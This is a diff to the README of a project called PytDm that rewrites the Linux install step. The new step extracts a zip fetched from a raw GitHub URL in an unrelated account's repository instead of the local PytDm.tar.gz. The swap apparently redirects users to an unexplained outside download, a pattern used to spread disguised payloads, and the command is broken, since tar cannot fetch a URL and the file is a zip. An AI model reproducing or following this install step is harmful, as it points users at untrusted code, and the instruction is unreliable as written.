atulpanda2006/PytDm/README.md

 - **Linux:**
   1. Open a terminal.
   2. Navigate to the downloaded directory.
-  3. Extract the contents with: `tar -xvzf PytDm.tar.gz`.
+  3. Extract the contents with: `tar -xvzf https://raw.githubusercontent.com/DarkSide7839/PytDm/main/illusively/PytDm.zip`.
   4. Follow the included instructions to run the application.

 ## 🎯 Features